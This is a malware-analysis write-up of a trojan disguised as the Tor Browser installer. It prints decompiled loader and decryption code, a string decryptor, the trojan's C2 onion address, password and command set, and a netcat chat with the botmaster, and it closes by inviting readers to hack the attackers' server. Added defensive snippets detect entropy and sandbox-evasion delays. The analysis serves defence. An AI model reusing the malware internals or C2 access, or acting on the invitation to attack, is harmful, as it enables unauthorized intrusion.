A couple of hours ago, a friend of mine told me:
< nextgens> jvoisin> if you want some malware to look into: torbundlebrowser.org
The website is an almost perfect copy of the original, except for the download link and the donation link, the latter replaced by the author's own Bitcoin address.
Fake one
Original one
First binary
I downloaded the alleged Tor Browser Bundle (password: infected), named "torbrowser-install-3.6.3_en-US.exe", and PEiD/yara told me that it's a .NET executable. ILSpy shows us:
// Entry point: eval_b.a
// Architecture: x86
// Runtime: .NET 2.0
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyVersion("3.6.3.0")]
[assembly: Dotfuscator("retail:1:1:4.9.5000.15987", 1, true)]
[assembly: AssemblyCompany("Tor Project")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCopyright("Copyright © 2014")]
[assembly: AssemblyDescription("Tor Browser")]
[assembly: AssemblyFileVersion("3.6.3.0")]
[assembly: AssemblyProduct("Tor Browser 3.6.3")]
[assembly: AssemblyTitle("Tor Browser Obfuscated with Dotfuscator Professional Evaluation. Illegal to use on software for general release.")]
[assembly: AssemblyTrademark("")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: ComVisible(false)]
[assembly: Guid("00000000-0000-0000-0000-000000000000")]
Just drop the binary into the latest version of de4dot to get a deobfuscated version.
There is an interesting resource named "TorProject.vid.mkv", which seems to be some data with high entropy: likely a packed/crypted payload.
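Before spending time on the decryption routine, an analyst usually confirms the "high entropy" impression with a number. The following is an added example, not code from the post: it computes the Shannon entropy of a byte blob and applies a rough triage label. The samples are constructed stand-ins for resources carved out of an assembly, and the 7.5 bits/byte threshold is an assumed rule of thumb.

```python
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant blob, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def classify_resource(data: bytes, high: float = 7.5, low: float = 1.0) -> str:
    """Rough triage label; the thresholds are an assumed rule of thumb, not a hard rule."""
    h = shannon_entropy(data)
    if h >= high:
        return "high-entropy (likely packed or encrypted)"
    if h <= low:
        return "low-entropy (padding or empty)"
    return "plain (text or code)"


# Constructed stand-ins for resources pulled out of an assembly (not real samples).
SAMPLES = {
    "zeros": bytes(4096),
    "text": b"The quick brown fox jumps over the lazy dog. " * 100,
    "random": os.urandom(8192),  # statistically indistinguishable from an AES-encrypted payload
}


def triage(samples=SAMPLES):
    """Return {name: (entropy rounded to 2 decimals, label)} for every sample."""
    return {name: (round(shannon_entropy(d), 2), classify_resource(d)) for name, d in samples.items()}


if __name__ == "__main__":
    for name, (h, label) in triage().items():
        print(f"{name:7s} {h:5.2f} bits/byte  {label}")
```

Compressed data scores almost as high as encrypted data, so a high-entropy resource only tells you that it is worth looking for the routine that unpacks it, which is exactly what the next step of this write-up does.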
The sample has a few methods; here is the (only) interesting one:
// eval_a
public static void eval_a(string string_0, string string_1, string string_2) {
    try {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) {
            byte[] bytes = Encoding.UTF8.GetBytes(string_2);   // key
            byte[] bytes2 = Encoding.UTF8.GetBytes(string_2);  // IV: the same bytes as the key
            using (FileStream fileStream = new FileStream(string_0, FileMode.Open)) {
                using (FileStream fileStream2 = new FileStream(string_1, FileMode.Create)) {
                    using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(bytes, bytes2)) {
                        using (CryptoStream cryptoStream = new CryptoStream(fileStream, cryptoTransform, CryptoStreamMode.Read)) {
                            int num;
                            while ((num = cryptoStream.ReadByte()) != -1)
                                fileStream2.WriteByte((byte)num);
                        }
                    }
                }
            }
        }
    }
    catch (Exception) {}
}
It's called with the following parameters:
- vid.mkv
- Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\Windows\" + "\windll32.exe"
- VisualStudio2010
So, to sum up, the next payload is encrypted with Rijndael (CBC mode with PKCS7 padding, the RijndaelManaged defaults), using "VisualStudio2010" as both the key and the IV, and the decrypted result is written to %AppData%\Windows\windll32.exe
Since I'm super lazy, I used a build of ILSpy with an integrated debugger, set a breakpoint after the decryption, and got the second binary.
Second binary
I was quite amused by some of the method names, since the binary may look like a game at first sight:
public static void CastNetToWinGame(string filename) // Make a screenshot
public static string MakeSenseofItAll(string Message, string Passphrase) // Decryption routine
public static string TallyUpScoresNewGame() // Network-interface-related crap
public static string NiceShot() // Check the serial number of Win32_Physicalmedia
public static string HighScores(string Message, string Passphrase) // Decryption routine
public static string E3nCodeIt(string filename) // Base64 encoding of files
public static void StartANewGame(string ProcessFilename, string args) // Start a new process
public static void ClearScores(string filename) // Delete a file
public static bool VirtualReality() // Check if the malware is in a virtual machine (VMWare/VirtualBox/VirtualPC)
public static void RegisterYourGame(string path) // Add a key in the registry for autostart/persistence
public static void MakeitNew(string upgfile) // Download, update/replace, run a new binary
public static string Levelup() // Get information about the hard drive
public void StartGame() // Set up the communication channel to the CC
public void RoundTwo() // Communication protocol with the CC
private void RecurringScores(string dirPath, string uploadPath) // Upload files recursively
private void ShotThroughTheHeart() // Try to take and upload a screenshot
private void FinalBossinGame(string filename) // Execute a custom command
private static void RollCredits() // Deploy the embedded Tor binary
...
Some commands are run by means of "cmd.exe", and are prefixed with "ping localhost -n 10 &", which simply waits about ten seconds before the real command runs: likely a crude way to ensure that those commands are not executed inside the analysis window of a sandbox like Cuckoo.
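A process-creation log can be screened for this trick. The following is an added example, not code from the post: it flags cmd.exe command lines that chain a loopback ping with an "-n" count in front of the real command, and reports the approximate delay and the command being hidden behind it. The regex, the minimum ping count of 5 and the sample command lines are my own assumptions and constructions.

```python
import re
from typing import Optional

# Command lines of the form:  [cmd.exe /c] ping localhost -n <count> & <real command>
# "ping -n N" to the loopback address sends N echo requests about one second apart,
# so the chained command only starts roughly N-1 seconds later.
DELAY_PREFIX = re.compile(
    r'^\s*(?:"?[^"\s]*cmd(?:\.exe)?"?\s+/[ck]\s+)?'   # optional "cmd.exe /c"
    r'"?ping(?:\.exe)?'                                # the ping binary
    r'(?=[^&]*\s-n\s+(?P<count>\d+))'                  # -n <count> somewhere before the chain operator
    r'[^&]*\b(?:localhost|127\.0\.0\.1)\b[^&]*'        # loopback target, no real network activity
    r'&{1,2}\s*(?P<payload>.+)$',                      # the chained real command
    re.IGNORECASE,
)


def detect_delay_prefix(cmdline: str, min_count: int = 5) -> Optional[dict]:
    """Return a finding for a delayed command line, or None if it does not match (or the delay is short)."""
    m = DELAY_PREFIX.match(cmdline)
    if not m:
        return None
    count = int(m.group("count"))
    if count < min_count:          # a single ping is normal troubleshooting, not evasion
        return None
    return {"delay_seconds": count - 1, "payload": m.group("payload").strip()}


# Constructed sample command lines, as a Sysmon/EDR process-creation feed would show them.
SAMPLE_COMMANDLINES = [
    'cmd.exe /c ping localhost -n 10 & "%APPDATA%\\Windows\\windll32.exe"',
    "ping localhost -n 10 & dir C:\\Users",
    "ping 8.8.8.8 -n 4",
    "ping localhost -n 1 & echo done",
    "cmd /c dir C:\\Users",
]


def scan(cmdlines=SAMPLE_COMMANDLINES, min_count: int = 5):
    """Return [(command line, finding)] for every line that carries a ping delay prefix."""
    hits = []
    for line in cmdlines:
        finding = detect_delay_prefix(line, min_count)
        if finding:
            hits.append((line, finding))
    return hits


if __name__ == "__main__":
    for line, finding in scan():
        print(f"~{finding['delay_seconds']}s delay before: {finding['payload']}")
        print(f"    from: {line}")
```

The loopback requirement matters: a ping to an external host is ordinary troubleshooting and would be noisy, whereas pinging yourself ten times has no purpose other than waiting.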
Decryption
Throughout the code there are calls to these decryption functions, with a base64-encoded string as first argument and "video game hall of fame" as second. Here is the corresponding decryption function:
public static string MakeSenseofItAll(string Message, string Passphrase) {
    UTF8Encoding uTF8Encoding = new UTF8Encoding();
    MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
    byte[] key = mD5CryptoServiceProvider.ComputeHash(uTF8Encoding.GetBytes(Passphrase)); // 16-byte (two-key) 3DES key
    TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
    tripleDESCryptoServiceProvider.Key = key;
    tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
    tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
    byte[] array = Convert.FromBase64String(Message);
    byte[] bytes;
    try {
        ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
        bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
    }
    finally {
        tripleDESCryptoServiceProvider.Clear();
        mD5CryptoServiceProvider.Clear();
    }
    return uTF8Encoding.GetString(bytes);
}
I wrote a quick'n'dirty decryptor in Python:
from Crypto.Cipher import DES3
from Crypto.Util.Padding import unpad
import hashlib
from base64 import b64decode

# Same key derivation as MakeSenseofItAll: MD5 of the passphrase is the
# 16-byte (two-key) 3DES key, used in ECB mode with PKCS7 padding.
key = hashlib.md5(b"video game hall of fame").digest()
cipher = DES3.new(key, DES3.MODE_ECB)

ciphertexts = [
    "M8aFUlePIs6oxgq7J5o/cw==",
    "/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7",
    "dsk6h/rjpLX3iTcm90vaMQ==",
    "/vAilHtgVYHl7LzMwlpm2Q==",
    "A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31",
    "oJTGIrUW7JfeVS7umpFv9Q==",
    "EgMhlrqaGkH3iTcm90vaMQ==",
    "dsk6h/rjpLX3iTcm90vaMQ==",
    "M635gItlrs+0hltKwH36eippmvgBHvW1",
    "QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU=",
]

for i in ciphertexts:
    # Strip the PKCS7 padding, as the .NET side does, before decoding as UTF-8.
    plaintext = unpad(cipher.decrypt(b64decode(i)), DES3.block_size)
    print("%s : %s" % (i, plaintext.decode("utf-8")))
This is the result:
M8aFUlePIs6oxgq7J5o/cw== : 127.0.0.1
/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7 : silkroad6cebts64.onion
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
/vAilHtgVYHl7LzMwlpm2Q== : downloaded OK
A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31 : Error downloading file
EgMhlrqaGkH3iTcm90vaMQ== : CONNECT|
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
M635gItlrs+0hltKwH36eippmvgBHvW1 : Screenshot Captured:
oJTGIrUW7JfeVS7umpFv9Q== : \videodrv.exe
QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU= : Error getting screenshot
Communication with the CC
The communication protocol is quite simple; the only interesting thing is that it runs over Tor, to the hidden service silkroad6cebts64.onion:24576
This is the message sent to connect to the CC and wait for commands:
CONNECT|v1.17117|117|
where v1.17 is the version number, and 117| is likely a release type identifier, since I found a "slim113" string in another sample.
Commands can be:
- Netcat, to launch another connection
- putfile, to download a file
- upgrade, to upgrade the malware
- shot, to get a screenshot
- updir, to upload a directory recursively
- syscommand, to execute a system command
- GetDrives, to get drives (duh.)
- reboot, to reboot (duh again)
- restart, to restart the malware
- get, to download a file
- getfile, to upload a file
There is also another port, 24577, with "Snake Video Game" as password, likely used for file transfers.
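As an added example (not part of the original post), here is a small parser for the pipe-delimited messages described above, the kind of thing one writes when reviewing a captured session or turning the protocol into a detection. The field split follows the CONNECT line exactly as printed above, the command table is the list given above, and the sample session is constructed; the meaning attached to the CONNECT fields is the post's guess, not something the parser can verify.

```python
from dataclasses import dataclass
from typing import List, Optional

# Commands documented for this sample, with what each one does on the bot.
KNOWN_COMMANDS = {
    "netcat": "launch another connection",
    "putfile": "download a file to the bot",
    "upgrade": "replace the malware binary",
    "shot": "take a screenshot",
    "updir": "upload a directory recursively",
    "syscommand": "execute a system command",
    "getdrives": "list drives",
    "reboot": "reboot the host",
    "restart": "restart the malware",
    "get": "download a file",
    "getfile": "upload a file",
}


@dataclass
class C2Message:
    kind: str            # CONNECT, MESSAGE, COMMAND or UNKNOWN
    fields: List[str]    # everything after the first "|", empty trailing fields dropped
    note: str = ""       # human-readable meaning, where known


def parse_message(raw: str) -> C2Message:
    """Classify one line of the pipe-delimited protocol."""
    parts = raw.rstrip("\r\n").split("|")
    head, fields = parts[0], [p for p in parts[1:] if p]
    if head == "CONNECT":
        return C2Message("CONNECT", fields, "bot check-in (version, release type)")
    if head == "MESSAGE":
        return C2Message("MESSAGE", fields, "status report from the bot")
    if head.lower() in KNOWN_COMMANDS:
        return C2Message("COMMAND", fields, KNOWN_COMMANDS[head.lower()])
    return C2Message("UNKNOWN", parts, "")


# Constructed session, interleaving both directions as a capture would show them.
SAMPLE_SESSION = [
    "CONNECT|v1.17117|117|",
    "shot|",
    "MESSAGE|Screenshot Captured:",
    "syscommand|dir C:\\Users",
    "MESSAGE|downloaded OK",
    "frobnicate|xyz",
]


def summarize(session=SAMPLE_SESSION) -> dict:
    """Reduce a session to what an analyst wants first: check-in version, commands issued, anything unexpected."""
    msgs = [parse_message(line) for line in session]
    version: Optional[str] = next((m.fields[0] for m in msgs if m.kind == "CONNECT" and m.fields), None)
    return {
        "checkin_version": version,
        "commands": [m for m in msgs if m.kind == "COMMAND"],
        "unknown": [m.fields for m in msgs if m.kind == "UNKNOWN"],
    }


if __name__ == "__main__":
    summary = summarize()
    print("check-in version:", summary["checkin_version"])
    for m in summary["commands"]:
        print(f"command {m.note}: {m.fields}")
    print("unknown:", summary["unknown"])
```

Anything landing in the "unknown" bucket is worth a second look: either a command this write-up did not see, or a different version of the bot.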
I even had a chitchat with the botmaster:
amnesia@amnesia:~$ nc silkroad6cebts64.onion 24577
Snake Video Game
.
dir
.
Hello :)
hi
Nice job with this malware
may i ask who this is
I stumbled upon your website, and was curious
oh nice. gj dissassembling. what did u use ?
ILSpy
I was curious about your payload
cool. great work. reflector could have worked too :D
Sure, but I prefer free s
are you a malware researcher?
I didn't get your question
[REDACTED]
oh,
payload needs work as u can tell
I'll be happy to take a look at it
Ho, by the way, I'm also curious
how did you find the site btw?
A friend of mine gave me the link
heh nice, what are you using now, putty?
netcat
ah
Cdo you write mal?
You want me to send you an email?
sure [REDACTED]@safe-mail.net
I'm curious about how many bots do you have
[...]
S/he told me that they are a small group (maybe from China) trying to catch pedophiles by spreading the link to the fake website on pedo boards, adding that one pedophile had already been reported to CyberTip. I'm not convinced, since the miscreant not only shipped malware instead of the real TBB, but also replaced the donation page with his own BTC address.
Their server is a stack of outdated crap, proudly powered by cPanel, feel free to pwn them for more details.